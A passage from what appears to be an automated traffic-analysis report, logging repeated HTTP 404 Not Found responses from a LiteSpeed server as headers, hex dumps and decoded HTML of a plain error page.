6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 24 Sep 2024 15:17:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 24 Sep 2024 15:17:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 24 Sep 2024 15:17:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 24 Sep 2024 15:18:15 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 24 Sep 2024 15:18:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 24 Sep 2024 15:18:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Tue, 24 Sep 2024 15:18:23 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 